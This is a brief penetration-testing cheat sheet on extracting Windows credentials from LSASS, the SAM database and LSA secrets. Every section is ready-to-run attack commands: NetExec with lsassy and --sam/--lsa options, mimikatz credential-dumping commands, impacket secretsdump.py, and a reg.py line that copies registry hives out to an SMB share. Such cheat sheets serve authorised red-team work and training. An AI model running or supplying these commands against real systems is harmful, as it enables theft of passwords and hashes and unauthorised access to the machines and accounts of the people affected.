Extract/Crack LSA & SAM

  1. Extract Creds from LSASS

nxc smb $net -u user -p password -M lsassy
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords"  "exit"

  1. Extract Creds from SAM

nxc smb $net -u user -p password --sam
mimikatz "privilege::debug" "lsadump::sam" "exit"
secretsdump.py <domain>/<user>:<password>@<ip>

  1. Extract Creds from LSA

nxc smb <ip_range> -u <user> -p <password> --lsa
mimikatz "privilege::debug" "lsadump::lsa" "exit"
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'

Last updated